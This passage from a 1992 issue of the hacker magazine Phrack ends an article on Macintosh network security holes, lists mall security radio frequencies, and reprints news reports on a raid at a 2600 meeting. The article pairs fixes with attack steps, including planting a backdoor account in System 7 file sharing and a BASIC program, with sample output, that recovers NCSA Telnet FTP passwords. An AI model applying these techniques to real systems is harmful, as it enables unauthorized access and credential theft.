  4331. method #1 to extract a username/password combination from the Prep file and use
  4332. that password to gain entrance to the VAX.
  4333.  
  4334. HOW TO SOLVE:  Disallow interactive logins on the VAX-side of the account and
  4335. disable or repassword all "default" accounts.  If your version of
  4336. VAX/AppleShare requires an interactive login, have a "special" program be run
  4337. whenever the user logs in, recording the date, time, and origin of login before
  4338. disconnecting.
  4339.  
  4340.  
  4341. SYSTEM 7 FILE SHARING
  4342. ~~~~~~ ~ ~~~~ ~~~~~~~
  4343. (4) With the advent of System 7.0 and "File Sharing," many users simply put
  4344. their machines "on the net" without taking proper measures to disallow
  4345. unauthorized access to their machine.  Several people turn Sharing on while
  4346. their drive is selected, unwittingly allowing others to read, write, copy,
  4347. delete, or modify the information on the drive.  Oddly enough, by default, the
  4348. "Trash" folder is locked out, while the System Folder is, by default, left wide
  4349. open.  A major oversight on Apple's part...  I suppose it was to discourage the
  4350. perceived threat of "digital dumpster diving" ...?  Even I cannot fathom that
  4351. one.
  4352.  
  4353. * Many times the "System Folder" is left unprotected, meaning various system
  4354. resources can be copied or modified.  One can leech the AppleTalk Remote Access
  4355. files, any Timbuk2 or Timbuk2/Remote programs, etc. and use them to further
  4356. penetration.
  4357.  
  4358. * The "Users & Groups" file can be copied, then modified "at home" by a user
  4359. running 7.0 [or by the attacking machine, if it is running 7.0] -- adding
  4360. another "owner" account, for instance, to act as a "back door" in the event
  4361. guest privileges are locked out by a wiser individual.
  4362.  
  4363. * The integrity of important files can be challenged; the System file can have
  4364. resources moved in and out of it by the attacking computer -- one of these
  4365. resources could be a virus, a Trojan horse, or a really stupid font [like New
  4366. York -- ugh!].
  4367.  
  4368. * The disk is usually populated by copyrighted software; one could easily make
  4369. pirated copies of that software.
  4370.  
  4371. * The disk may be home to personal or otherwise "private" files -- files that
  4372. can be read, copied, deleted, or even modified.  There was an instance in which
  4373. a file on a shared folder was found to contain user names and passwords to a
  4374. UNIX box on the campus network... incredibly foolish.  Fortunately, the proper
  4375. persons were informed and the files were moved to a [presumably] safer
  4376. location.
  4377.  
  4378. * The attacker could have a malicious streak and choose to delete all that he
  4379. sees.
  4380.  
  4381. HOW TO SOLVE:  Take a giant wooden plank and soundly whack all offending users.
  4382. Tell them of the intelligent way to use filesharing, and inform them that
  4383. *anyone* can go in and read their resume, love notes, financial info, erotic
  4384. poetry, etc.. that usually gets their attention. Tell them to, instead of
  4385. sharing the entire hard drive, create a folder and entitle it "Shares" or
  4386. something appropriately witty; then select the folder and go to "Sharing..."
  4387. To further security, disallow the <Any User> (Guest) logins.  To better keep
  4388. track of who's using the Macintosh, keep the "File Sharing Monitor" open or get
  4389. a program like NokNok which notifies you when someone is using your Mac.
  4390.  
  4391.  
  4392. NCSA TELNET
  4393. ~~~~ ~~~~~~
  4394. 5) The NCSA Telnet application allows a user to use his or her Mac as a telnet
  4395. client and wander around the Internet.  NCSA Telnet also handles incoming FTP
  4396. requests.  While this FTP function is easily disabled, many users keep it on
  4397. because they either use it regularly or don't even know it exists.
  4398.  
  4399. * Anyone with a valid username/password can log in to the Mac via FTP and then
  4400. change to the "root" directory and perform the normal FTP functions.. both send
  4401. and receive.  This means that *every* file on the Mac can be accessed from
  4402. *anywhere* on the Internet.  It should be noted that NCSA Telnet does not log
  4403. the "who & where" information, meaning there is no log of who used the machine,
  4404. meaning there is no way for an intruder to be "caught."
  4405.  
  4406. * The file "ftppass" contains the list of users allowed to use FTP on that
  4407. Macintosh.  If, by using one of the methods mentioned above, someone is able to
  4408. access it, it is easily cracked as it has a rather pathetic encryption scheme:
  4409. the data fork contains the user's name, a colon, and then an encrypted
  4410. password.  The password is easily decrypted; unless it is the entire 10
  4411. characters, the last few characters are in order.  That is, the next ASCII code
  4412. is 1 + the previous, etc.  Observe this from my "ftppass" file:
  4413.  
  4414. sample:ucetcr&'()
  4415.  
  4416. The first part, "sample," is the user's name.  The colon is the basic UNIX-like
  4417. delimiter, the rest is the password.  The "real" part of the password is the
  4418. characters "ucetcr" ... the remaining "&'()" are just spaces... how do you
  4419. tell?  It's in ASCII order.  Look up "&" on an ASCII chart and "'" will follow,
  4420. then "(" then ")" .. you get the idea.
  4421.  
  4422. This password can be discovered by short program XORing the encrypted
  4423. characters with a number between 0 and 255.  The program can either a) dump all
  4424. XOR results or b) if the password is not the maximum length, the program can
  4425. simply scan for a "space" [ASCII 032 decimal] in the password and print it.
  4426. The following "cracking" program is written in BASIC [hey, does anyone use that
  4427. any more?] and will allow you to decrypt the passwords.  If you can tell that
  4428. the password has spaces at the end, you can go ahead and delete line 110.
  4429. Otherwise, leave that line in and use your brain [remember your brain?] to
  4430. determine if the encrypted goop is a "real" word or just goop.
  4431.  
  4432. 5 REM "ftppass" brute-force hacker
  4433. 10 INPUT "Encrypted password:";I$
  4434. 20 FOR X=1 TO 255
  4435. 30 FOR Y=1 TO LEN(I$)
  4436. 40 Y$=MID$(I$,Y,1)
  4437. 50 YA=ASC(Y$)
  4438. 60 N=X XOR YA
  4439. 70 IF N=32 THEN F=1
  4440. 80 N$=N$+CHR$(N)
  4441. 90 NEXT Y
  4442. 100 IF F THEN ?"Possible password:"N$
  4443. 110 ?I$" 'encrypts' to "N$: REM U can delete this line if len<10
  4444. 120 N$="":F=0
  4445. 130 NEXT X
  4446. 140 ?"Finished."
  4447.  
  4448. Sample run:  [with line 110 deleted]
  4449.  
  4450. Encrypted password:ucetcr&'()           [gotta type the whole thing]
  4451. Possible password:secret !./            [boy, that was tough!]
  4452. Possible password:rdbsdu! /.
  4453. Possible password:}km|kz./ !            [etc.. just smack ^C at this point.]
  4454.  
  4455. So the password is "secret" [clever, no?]
  4456.  
  4457. It should be noted that this program is rather inelegant as I haven't really
  4458. reversed the algorithm, just written a brute-force "hacker" for it.  This is
  4459. due to laziness on my part.  If I really wanted to do this properly, I would
  4460. FTP to the NCSA anonymous site and leech the 700k+ of source and "reverse" it
  4461. thataway.  I don't feel like doing that.  I am lazy.  This program works just
  4462. dandy for me... [I suspect the encryption program uses the users' name to
  4463. encrypt it, but I don't care enough to find out.]
  4464.  
  4465. I should say that I don't wish to offend the makers of NCSA Telnet or call the
  4466. application crap.  It is, indeed, an impressive piece of work; I simply feel
  4467. that there are some aspects of it which could use improvement... if not in
  4468. terms of security, then at least allowing the user to save selections to disk!
  4469.  
  4470. BTW- I know that NCSA Telnet is also available for the IBM.  I haven't tested
  4471. these with an IBM, but if it's a "true" port, these flaws should exist under
  4472. the IBM version as well.
  4473.  
  4474.                                - = - = - = - = -
  4475.  
  4476. Well, that does it.  If you're a network coordinator and you're *still* sitting
  4477. on your skinny ass after reading this, get the hell up and fix the problems.
  4478. Don't be surprised to find someone running anonymously through your net,
  4479. leeching files and generally contributing to moral laxity ...  I've seen it
  4480. before -- it's not a pretty sight.
  4481.  
  4482. And of course, if you run a network of any sort, you must encourage users to
  4483. use different passwords on different machines and passwords that don't exist in
  4484. a dictionary [gh0ds are we sick of hearing that!].. it will work wonders for
  4485. security.  Every hacker knows the number of people who use ONE password to all
  4486. of their different accounts is unbelievably high... and they make very good use
  4487. of this oversight.
  4488.  
  4489. - = - = - = - = - = - = - = - =- = - = - = - =- = - = - = - =- = - = - = - = -
  4490.  
  4491.  
  4492.                                 ==Phrack Inc.==
  4493.  
  4494.                   Volume Four, Issue Forty-One, File 10 of 13
  4495.  
  4496.           |                                                       |
  4497.       _o  #                   Mall Cop Frequencies                #  o_
  4498.      /()\/~                                                       ~\/()\
  4499.      ~\\                        by Caligula XXI                      //~
  4500.       ||                                                             ||
  4501.       ~~                                                             ~~
  4502.  
  4503.                   THIS ONE IS DEDICATED TO THE DC 2600 MEETING
  4504.  
  4505. Living in America, one can easily and falsely assume that there really is a
  4506. Bill of Rights.  On November 6, 1992, the right to peaceably gather was
  4507. suspended.  Even though the U.S. Supreme Court ruled that shopping malls are
  4508. "public meeting places" and not private property, it doesn't make a damn bit of
  4509. difference to pigs.  So here is a little information that may help you keep an
  4510. eye on them while they are so preoccupied with us.
  4511.  
  4512. If your shopping mall is not listed below, try scanning (MHz):
  4513.  
  4514.                  151.625 to 151.955          154.515 to 154.60
  4515.                  457.5125 to 457.6125        460.65 to 462.1875
  4516.                  462.75 to 462.775           463.20 to 464.9875
  4517.                  465.65 to 467.1875          467.75 to 467.925
  4518.                  468.20 to 469.975           851.0125 to 865.9875
  4519.  
  4520. Following the shopping mall list is a list of nationwide stores and their
  4521. security frequencies.
  4522.  
  4523.  __________________________________________________________
  4524. / ST   City               Mall                   Freq. MHz \
  4525. |==========================================================|
  4526. | AK | Anchorage        | Northway Mall         | 461.775  |
  4527. | AL | Birmingham       | Century Plaza         | 464.875  |
  4528. | AL | Mobile           | Belair Mall           | 464.875  |
  4529. | AL | Montgomery       | Montgomery Mall       | 466.0625 |
  4530. | AZ | Phoenix          | Metrocenter           | 464.475  |
  4531. | AZ | Phoenix          | Paradise Valley Mall  | 464.375  |
  4532. | AZ | Tucson           | Foothills Mall        | 464.575  |
  4533. | CA | Bakersfield      | Valley Plaza Shop Cent| 154.57   |
  4534. | CA | Canoga Park      | Topanga Plaza         | 154.54   |
  4535. | CA | Los Angeles      | Century City Center   | 461.025  |
  4536. | CA | Oxnard           | Center Points Mall    | 464.475  |
  4537. | CA | San Francisco    | Embarcardero Center   | 854.8375 |
  4538. | CO | Boulder          | Crossroads Mall       | 468.7875 |
  4539. | CO | Denver           | Laksie Mall           | 464.375  |
  4540. | CT | Hartford         | Northeast Plaza       | 464.375  |
  4541. |    |                  |                       | 464.675  |
  4542. |    |                  |                       | 464.80   |
  4543. |    |                  |                       | 464.95   |
  4544. | CT | Danbury          | Fair Mall             | 464.675  |
  4545. | DC | Washington       | Montgomery Mall       | 463.25   |
  4546. | DC | Washington       | Renaissance Plaza     | 463.375  |
  4547. | FL | Jacksonville     | Gateway Mall          | 461.025  |
  4548. | FL | Miami            | South Date Plaza      | 461.675  |
  4549. | FL | Ft. Charlotte    | South Port Square     | 154.54   |
  4550. | FL | Tallahassee      | Tallahassee Mall      | 461.20   |
  4551. |    |                  |                       | 463.60   |
  4552. | FL | Tampa            | W. Shore Plaza        | 461.9125 |
  4553. | GA | Atlanta          | Piedmont Center       | 464.525  |
  4554. |    |                  |                       | 464.5875 |
  4555. | GA | Atlanta          | Peachtree Center      | 461.825  |
  4556. | HI | Pearl City       | Century Park Plaza    | 464.225  |
  4557. | IA | Des Moines       | Merel Hay Mall        | 154.54   |
  4558. |    |                  |                       | 154.57   |
  4559. | IA | West Burlington  | Southridge Mall       | 464.675  |
  4560. | IL | Springfield      | The Center            | 464.925  |
  4561. | IL | Chicago          | Ford City Center      | 464.775  |
  4562. |    |                  |                       | 464.975  |
  4563. | IL | Aurora           | Fox Valley Center     | 464.675  |
  4564. | IN | Ft. Wayne        | Glenbrook Square      | 464.575  |
  4565. |    |                  |                       | 464.875  |
  4566. | IN | Indianapolis     | Lafayette Square      | 461.025  |
  4567. | KS | Manhattan        | Manhattan Tower Center| 463.525  |
  4568. | KS | Kansas City      | Bannister Mall        | 464.575  |
  4569. |    |                  |                       | 464.675  |
  4570. | KY | Lexington        | Fayette Mall          | 462.1125 |
  4571. | KY | Louisville       | Oxmoor Center         | 464.8125 |
  4572. | LA | New Orleans      | World Trade Center    | 463.25   |
  4573. | LA | Shreveport       | Mall St. Vincent      | 464.675  |
  4574. | MA | North Attleboro  | Emerald Square Mall   | 461.725  |
  4575. | MA | Boston           | World Trade Center    | 461.9125 |
  4576. |    |                  |                       | 461.9375 |
  4577. |    |                  |                       | 461.9625 |
  4578. |    |                  |                       | 462.1625 |
  4579. |    |                  |                       | 464.80   |
  4580. | MA | Boston           | Copley Plaza          | 154.60   |
  4581. | MA | Watertown        | Arsenal Mall          | 464.95   |
  4582. | MD | Baltimore        | Eastpoint Mall        | 151.805  |
  4583. | MD | Greenbelt        | Beltway Plaza Mall    | 151.925  |
  4584. | MI | Ann Arbor        | Briarwood Mall        | 462.05   |
  4585. |    |                  |                       | 462.575  |
  4586. | MI | Detroit          | Renaissance Center    | 151.955  |
  4587. |    |                  |                       | 462.60   |
  4588. |    |                  |                       | 462.7625 |
  4589. | MI | Grand Rapids     | Woodland Center       | 464.475  |
  4590. |    |                  |                       | 464.5375 |
  4591. | MN | Rochester        | Center Place          | 464.475  |
  4592. |    |                  |                       | 464.5375 |
  4593. | MO | Kansas City      | Banister Mall         | 464.575  |
  4594. |    |                  |                       | 464.675  |
  4595. | MO | St. Louis        | Galleria              | 461.9125 |
  4596. |    |                  |                       | 462.0875 |
  4597. |    |                  |                       | 462.8625 |
  4598. | MS | Tupelo           | Mall @ Barnes Cross   | 464.60   |
  4599. | MT | Billings         | West Park Plaza       | 464.775  |
  4600. | NC | Raleigh          | North Hills Mall      | 464.575  |
  4601. | NC | Wilmington       | Independence Mall     | 464.7875 |
  4602. | ND | Great Forks      | Columbia Mall         | 463.60   |
  4603. | NE | Freendale        | Southridge Mall       | 464.525  |
  4604. | NE | North Platte     | The Mall              | 461.425  |
  4605. | NH | Newington        | Foxrun Mall           | 463.975  |
  4606. |    |                  |                       | 464.225  |
  4607. | NH | Nashua           | Pheasant Lane Mall    | 464.95   |
  4608. | NJ | Atlantic City    | Ocean One Mall        | 461.90   |
  4609. | NJ | Short Hills      | Mall @ Short Hills    | 464.825  |
  4610. | NJ | New Brunswick    | Fashion Plaza         | 464.475  |
  4611. | NV | Reno             | Park Lane Mall        | 464.05   |
  4612. | NY | Colonie          | Northway Mall         | 461.6875 |
  4613. | NY | Mineola          | Roosevelt Field       | 462.725  |
  4614. | NY | Massapequa       | Sunrise Mall          | 151.865  |
  4615. |    |                  |                       | 464.465  |
  4616. | NY | Mt. Vernon       | Cross Country Center  | 154.57   |
  4617. |    |                  |                       | 154.60   |
  4618. | NY | New York         | Gateway Plaza         | 464.825  |
  4619. | NY | Lake Grove       | Smithaven Mall        | 154.60   |
  4620. | OH | Columbus         | Northland Mall        | 463.625  |
  4621. |    |                  |                       | 464.925  |
  4622. | OH | Cleveland        | Randall Park          | 461.425  |
  4623. | OH | Youngstown       | Southern Park Mall    | 461.50   |
  4624. | OK | Broken Arrow     | Woodland Hills Mall   | 461.075  |
  4625. |    |                  |                       | 469.675  |
  4626. | OK | Oklahoma City    | North Park Mall       | 464.7875 |
  4627. | OR | Eugene           | Gateway Mall          | 461.125  |
  4628. | OR | Portland         | Washington Square Mall| 464.475  |
  4629. | PA | Media            | Granite Run Mall      | 464.325  |
  4630. | PA | Pittsburgh       | Century III           | 464.325  |
  4631. |    |                  |                       | 464.375  |
  4632. |    |                  |                       | 464.975  |
  4633. | PA | Pittsburgh       | Parkway Center Mall   | 464.6875 |
  4634. | RI | Newport          | Mall @ Newport        | 461.575  |
  4635. | SC | Columbia         | Columbia Mall         | 462.1125 |
  4636. | SC | Spartanburg      | Westgate Mall         | 151.955  |
  4637. | TN | Knoxville        | East Town Mall        | 463.3375 |
  4638. | TN | Memphis          | Mall of Memphis       | 464.975  |
  4639. | TN | Nashville        | Bellevue Center       | 464.825  |
  4640. | TX | San Antonio      | Wonderland Mall       | 467.875  |
  4641. |    |                  |                       | 469.9125 |
  4642. | TX | Dallas           | World Trade Center    | 464.375  |
  4643. |    |                  |                       | 464.875  |
  4644. | TX | Fort Worth       | Plaza Forth Worth     | 461.85   |
  4645. |    |                  |                       | 464.55   |
  4646. | TX | Houston          | West Oaks Mall        | 462.1125 |
  4647. |    |                  |                       | 464.3875 |
  4648. |    |                  |                       | 464.4875 |
  4649. | UT | Salt Lake City   | Crossroads Plaza      | 464.825  |
  4650. |    |                  |                       | 464.975  |
  4651. |    |                  |                       | 464.9875 |
  4652. | VA | Colonial Heights | Southpark Mall        | 855.5625 |
  4653. | VA | Hampton          | Coliseum Mall         | 464.30   |
  4654. | VA | Portsmouth       | Tower Mall            | 464.675  |
  4655. | WI | Milwaukee        | Southgate Mall        | 464.725  |
  4656. |    |                  |                       | 464.8875 |
  4657. | WV | Vienna           | Grand Central Mall    | 151.835  |
  4658. | WY | Cheyenne         | Frontier Mall         | 464.5125 |
  4659. \__________________________________________________________/
  4660.  
  4661.  __________________________________________________________
  4662. /                |                                         \
  4663. | J.C. Penny's   | 154.57, 154.60, 461.6125, 461.9375,     |
  4664. |                | 464.50, 464.55                          |
  4665. | K-Mart         | 154.57, 154.60, 457.5375, 457.5875,     |
  4666. |                | 461.3125,463.9125                       |
  4667. | Montgomery Ward| 467.8125                                |
  4668. | Sears          | 154.57, 454.50, 464.55                  |
  4669. | Toys R Us      | 461.7375, 461.9625, 463.7875, 464.9625  |
  4670. | Wal-Mart       | 151.625, 467.7625, 467.75, 467.775      |
  4671. |                | 467.80, 467.825, 467.85, 467.875, 467.90|
  4672. | Zayre          | 461.0125, 463.4125                      |
  4673. \________________|_________________________________________/
  4674. =========================================================================
  4675.  
  4676.  
  4677.  
  4678.                                 ==Phrack Inc.==
  4679.  
  4680.                   Volume Four, Issue Forty-One, File 11 of 13
  4681.  
  4682.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4683.               PWN                                             PWN
  4684.               PWN              Phrack World News              PWN
  4685.               PWN                                             PWN
  4686.               PWN           Issue 41 / Part 1 of 3            PWN
  4687.               PWN                                             PWN
  4688.               PWN        Compiled by Datastream Cowboy        PWN
  4689.               PWN                                             PWN
  4690.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4691.  
  4692.  
  4693.  Reports of "Raid" on 2600 Washington Meeting                  November 9, 1992
  4694.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4695.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4696.  
  4697. WASHINGTON, D.C. -- The publisher of a well-known hacker magazine claims a
  4698. recent meeting attended by those interested in the issues his magazine raises
  4699. was disrupted by threats of arrest by security and Arlington, Virginia police
  4700. officers.
  4701.  
  4702. Eric Corley, also known as "Emmanuel Goldstein," editor and publisher of "2600
  4703. Magazine: The Hacker Quarterly," told Newsbytes that the meeting was held
  4704. November 6th at the Pentagon City Mall outside Washington, DC was disrupted and
  4705. material was confiscated in the raid.
  4706.  
  4707. 2600 Magazine promotes monthly meetings of hackers, press, and other interested
  4708. parties throughout the country.  The meetings are held in public locations on
  4709. the first Friday evening of the month and the groups often contact each other
  4710. by telephone during the meetings.
  4711.  
  4712. Corley told Newsbytes that meetings were held that evening in New York,
  4713. Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los Angeles and San
  4714. Francisco.  Corley said, "While I am sure that meetings have been observed by
  4715. law enforcement agencies, this is the only time that we have been harassed.  It
  4716. is definitely a freedom of speech issue."
  4717.  
  4718. According to Craig Neidorf, who was present at the meeting and was distributing
  4719. applications for membership in Computer Professionals For Social Responsibility
  4720. (CPSR), "I saw the security officers focusing on us.  Then they started to come
  4721. toward us from a number of directions under what seemed to be the direction of
  4722. a person with a walkie-talkie on a balcony.  When they approached, I left the
  4723. group and observed the security personnel encircling the group of about 30
  4724. gatherers.  The group was mainly composed of high school and college students.
  4725. The guards demanded to search the knapsacks and bags of the gatherers.  They
  4726. confiscated material, including CPSR applications, a copy of Mondo 2000 (a
  4727. magazine), and other material."
  4728.  
  4729. He adds that the guards also confiscated film "from a person trying to take
  4730. pictures of the guards.  When a hacker called "HackRat" attempted to copy down
  4731. the names of the guards, they took his pencil and paper."
  4732.  
  4733. Neidorf continued, "I left to go outside and rejoined the group when they were
  4734. ejected from the mall.  The guards continued challenging the group and told
  4735. them that they would be arrested if they returned.  When one of the people
  4736. began to take pictures of the guards, the apparent supervisor became excited
  4737. and threatening but did not confiscate the film."
  4738.  
  4739. Neidorf also said, "I think that the raid was planned.  They hit right about
  4740. 6:00 and they identified our group as "hackers" and said that they knew that
  4741. this group met every month."
  4742.  
  4743. Neidorf's story was supported by a Washington "hacker" called "Inhuman," who
  4744. told Newsbytes, "I arrived at the meeting late and saw the group being detained
  4745. by the guards.  I walked along with the group as they were being ushered out
  4746. and when I asked a person who seemed to be in authority his name, he pointed at
  4747. a badge with his name written in script on it.  I couldn't make out the name
  4748. and, when I mentioned that to the person, he said 'If you can't read it, too
  4749. bad.'  I did read his name, 'C. Thomas,' from another badge."
  4750.  
  4751. Inhuman also told Newsbytes that he was told by a number of people that the
  4752. guards said that they were "acting on behalf of the Secret Service."  He added,
  4753. "I was also told that there were two police officers from the Arlington County
  4754. Police present but I did not see them."
  4755.  
  4756. Another attendee, Doug Luce, reports, "I also got to the DC meeting very late;
  4757. 7:45 or so.  It seemed like a coordinated harassment episode, not geared toward
  4758. busting anyone, but designed to get people riled up, and maybe not come back to
  4759. the mall."
  4760.  
  4761. Luce adds that he overheard a conversation between someone who had brought a
  4762. keyboard to sell.  The person, he said, was harassed by security forces, one of
  4763. whom said, "You aren't selling anything in my mall without a vendors permit!"
  4764.  
  4765. Possible Secret Service involvement was supported by a 19 year-old college
  4766. student known as the "Lithium Bandit," who told Newsbytes, "I got to the mall
  4767. about 6:15 and saw the group being detained by approximately 5 Arlington County
  4768. police and 5 security guards. When I walked over to see what was going on, a
  4769. security guard asked me for an ID and I refused to show it, saying that I was
  4770. about to leave.  The guard said that I couldn't leave and told me that I had to
  4771. see a police officer.  When I did, the officer demanded ID and, when I once
  4772. again refused, he informed me that I could be detained for up to 10 hours for
  4773. refusing to produce identification.  I gave in and produced my school ID which
  4774. the police gave to the security people who copied down my name and social
  4775. security number."
  4776.  
  4777. Lithium Bandit continued, "When I asked the police what was behind this action,
  4778. I was told that they couldn't answer but that 'the Secret Service is involved
  4779. and we are within our rights doing this."
  4780.  
  4781. The boy says he and others later went to the Arlington police station to get
  4782. more information and were told only that there was a report of the use of a
  4783. stolen credit card and two officers were sent to investigate.  "They later
  4784. admitted that it was 5 (officers).  While I was detained, I heard no mention of
  4785. a credit card and there was no one arrested."
  4786. Marc Rotenberg, director of CPSR's Washington office, told Newsbytes, "I have
  4787. really no details on the incident yet, but I am very concerned about the
  4788. reports. Confiscation of CPSR applications, if true, is outrageous.  I will
  4789. find out more facts on Monday."
  4790.  
  4791. Newsbytes was told by the Pentagon City Mall office that any information
  4792. concerning the action would have to come from the director of security, Al
  4793. Johnson, who was not available until Monday.  The Arlington Country Police
  4794. referred Newsbytes to a "press briefing recording" which had not been updated
  4795. since the morning before the incident.
  4796.  
  4797. Corley told Newsbytes, "There have been no reports of misbehavior by any of
  4798. these people.  They were obviously singled out because they were hackers.  It's
  4799. as if they were being singled out as an ethnic group.  I admire the way the
  4800. group responded -- in a courteous fashion.  But it is inexcusable that it
  4801. happened.  I will be at the next Washington meeting to insure that it doesn't
  4802. happen again."
  4803.  
  4804. The manager of one of New York state's largest malls provided background
  4805. information to Newsbytes on the rights of malls to police those on mall
  4806. property, saying, "The primary purpose of a mall is to sell. The interior of
  4807. the mall is private property and is subject to the regulations of the mall.
  4808. The only requirement is that the regulations be enforced in an even-handed
  4809. manner.  I do not allow political activities in my mall so I could not make an
  4810. exception for Democrats.  We do allow community groups to meet but they must
  4811. request space at least two weeks before the meeting and must have proper
  4812. insurance.  Our regulations also say that groups of more than 4 may not
  4813. congregate in the mall."
  4814.  
  4815. The spokeswoman added that mall security can ask for identification from those
  4816. who violate regulations and that they may be barred from the mall for a period
  4817. of 6 months.
  4818.  
  4819. She added, "Some people feel that mall atriums and food courts are public
  4820. space.  They are not and the industry is united on this.  If the malls were to
  4821. receive tax benefits for the common space and public service in snow removal
  4822. and the like, it could possibly be a public area but malls are taxed on the
  4823. entire space and are totally private property, subject to their own
  4824. regulations.  If a group of 20 or more congregated in my mall, they would be
  4825. asked to leave."
  4826.  
  4827. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4828.  
  4829.  Confusion About Secret Service Role In 2600 Washington Raid   November 7, 1992
  4830.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4831.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4832.  
  4833. WASHINGTON, D.C.-- In the aftermath of an action on Friday, November 6th by
  4834. members of the Pentagon City Mall Police and police from Arlington County,
  4835. Virginia in which those attending a 2600 meeting at the mall were ordered from
  4836. the premises, conflicting stories continue to appear.
  4837.  
  4838. Attendees at the meeting have contended to Newsbytes that members of the mall
  4839. police told them that they were "acting on behalf of the Secret Service."  They
  4840. also maintain that the mall police confiscated material from knapsacks and took
  4841. film from someone attempting to photograph the action and a list of the names
  4842. of security officers that one attendee was attempting to compile.
  4843.  
  4844. Al Johnson, chief of security for the mall, denied these allegations to
  4845. Newsbytes, saying "No one said that we were acting on behalf of the Secret
  4846. Service.  We were merely enforcing our regulations.  While the group was not
  4847. disruptive, it had pulled tables together and was having a meeting in our food
  4848. court area.  The food court is for people eating and is not for meetings.  We
  4849. therefore asked the people to leave."
  4850.  
  4851. Johnson denied that security personnel took away any film or lists and further
  4852. said "We did not confiscate any material.  The group refused to own up to who
  4853. owned material on the tables and in the vicinity so we collected it as lost
  4854. material.  If it turns out that anything did belong to any of those people,
  4855. they are welcome to come in and, after making proper identification, take the
  4856. material."
  4857.  
  4858. In a conversation early on November 9th, Robert Rasor, Secret Service agent-in-
  4859. charge of computer crime investigations, told Newsbytes that having mall
  4860. security forces represent the Secret Service is not something that was done
  4861. and, that to his knowledge, the Secret Service had no involvement with any
  4862. Pentagon City mall actions on the previous Friday.
  4863.  
  4864. A Newsbytes call to the Arlington County police was returned by a Detective
  4865. Nuneville who said that her instructions were to refer all questions concerning
  4866. the matter to agent David Adams of the Secret Service.  She told Newsbytes that
  4867. Adams would be providing all information concerning the involvement of both the
  4868. Arlington Police and the Secret Service in the incident.
  4869.  
  4870. Adams told Newsbytes "The mall police were not acting as agents for the Secret
  4871. Service. Beyond that, I can not confirm or deny that there is an ongoing
  4872. investigation."
  4873.  
  4874. Adams also told Newsbytes that "While I cannot speak for the Arlington police,
  4875. I understand that their involvement was due to an incident unrelated to the
  4876. investigation."
  4877.  
  4878. Marc Rotenberg, director of the Washington office of Computer Professionals for
  4879. Social Responsibility (CPSR), told Newsbytes "CPSR has reason to believe that
  4880. the detention of people at the Pentagon City Mall last Friday was undertaken at
  4881. the behest of the Secret Service, which is a federal agency.  If that is the
  4882. case, then there was an illegal search of people at the mall.  There was no
  4883. warrant and no indication of probable illegal activity.  This raises
  4884. constitutional issues. We have undertaken the filing of a Freedom of
  4885. Information Act (FOIA) request to determine the scope, involvement and purpose
  4886. of the Secret Service in this action."
  4887.  
  4888. 2600 meetings are held on the evening of the first Friday of each month in
  4889. public places and malls in New York City, Washington, Philadelphia, Cambridge,
  4890. St. Louis, Chicago, Los Angeles and San Francisco.  They are promoted by 2600
  4891. Magazine: The Hacker Quarterly and are attended by a variety of persons
  4892. interested in telecommunications and so-called "hacker issues".  The New York
  4893. meeting, the oldest of its kind, is regularly attended by Eric Corley a/k/a
  4894. Emmanuel Goldstein, editor and publisher of 2600, hackers, journalists,
  4895. corporate communications professionals and other interested parties.  It is
  4896. known to have been the subject of surveillance at various times by law
  4897. enforcement agencies conducting investigations into allegations of computer
  4898. crime.
  4899.  
  4900. Corley told Newsbytes "While I'm sure that meetings have been observed by law
  4901. enforcement agencies, this is the only time that we have been harassed.  It's
  4902. definitely a freedom of speech issue." Corley also that he plans to be at the
  4903. December meeting in Washington "to insure that it doesn't happen again."
  4904.  
  4905. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4906.  
  4907.  Conflicting Stories In 2600 Raid; CRSR Files FOIA            November 11, 1992
  4908.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4909.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4910.  
  4911. WASHINGTON, D.C. -- In the on-going investigation of possible Secret Service
  4912. involvement in the Friday, November 6th ejection of attendees at a "2600
  4913. meeting" from the premises of the Pentagon City Mall, diametrically opposed
  4914. statements have come from the same source.
  4915.  
  4916. Al Johnson, chief of security for the Pentagon City Mall told Newsbytes on
  4917. Monday, November 9th "No one said that we were acting on behalf of the Secret
  4918. Service.  We were merely enforcing our regulations.  While the group was not
  4919. disruptive, it had pulled tables together and was having a meeting in our food
  4920. court area.  The food court is for people eating and is not for meetings.  We
  4921. therefore asked the people to leave."
  4922.  
  4923. On the same day, Johnson was quoted was quoted in a Communications Daily
  4924. article by Brock Meeks as saying "As far as I'm concerned, we're out of this.
  4925. The Secret Service, the FBI, they're the ones that ramrodded this whole thing."
  4926.  
  4927. Newsbytes contacted Meeks to discuss the discrepancies in the stories and were
  4928. informed that the conversation with Johnson had been taped and was available
  4929. for review.  The Newsbytes reporter listened to the tape (and reviewed a
  4930. transcript).  On the tape, Johnson was clearly heard to make the statement
  4931. quoted by Meeks.
  4932.  
  4933. He also said "maybe you outta call the Secret Service, they're handling this
  4934. whole thing.  We, we were just here", and, in response to a Meeks question
  4935. about a Secret Service contact, "Ah.. you know, I don't have a contact person.
  4936. These people were working on their own, undercover, we never got any names, but
  4937. they definitely, we saw identification, they were here."
  4938.  
  4939. Newsbytes contacted Johnson again on the morning of Wednesday, November 11 and
  4940. asked him once again whether there was any Secret Service involvement in the
  4941. action. Johnson said "No, I told you that they were not involved."  When it was
  4942. mentioned that there was a story in Communications Daily, quoting him to the
  4943. contrary, Johnson said "I never told Meeks that.  There was no Secret Service
  4944. involvement"
  4945.  
  4946. Informed of the possible existence of a tape quoting him to the contrary.
  4947. Johnson said "Meeks taped me? He can't do that.  I'll show him that I'm not
  4948. fooling around.  I'll have him arrested."
  4949.  
  4950. Johnson also said "He asked me if the Secret Service was involved; I just told
  4951. him that, if he thought they were, he should call them and ask them."
  4952.  
  4953. Then Johnson again told Newsbytes that the incident was "just a mall problem.
